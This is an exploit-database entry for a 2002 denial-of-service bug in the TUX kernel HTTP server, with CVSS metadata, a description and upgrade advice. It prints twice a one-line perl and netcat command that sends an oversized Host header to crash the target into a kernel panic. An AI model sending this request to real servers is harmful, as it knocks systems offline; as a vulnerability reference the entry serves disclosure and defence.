header-logo
Suggest Exploit
vendor:
TUX
by:
SecurityFocus
7.2
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: TUX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:tux_http_server_project:tux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

TUX Kernel Panic

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. The exploit can be triggered by sending a crafted HTTP request with an oversized Host header using the following command: perl -e "print qq(GET / HTTP/1.0Accept: */*Host: ) . qq(A) x 6000 . qq(n)" |nc <ip address> <dest_port>

Mitigation:

Upgrade to the latest version of TUX to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>

Navigation

Suggest Exploit

Services By CQR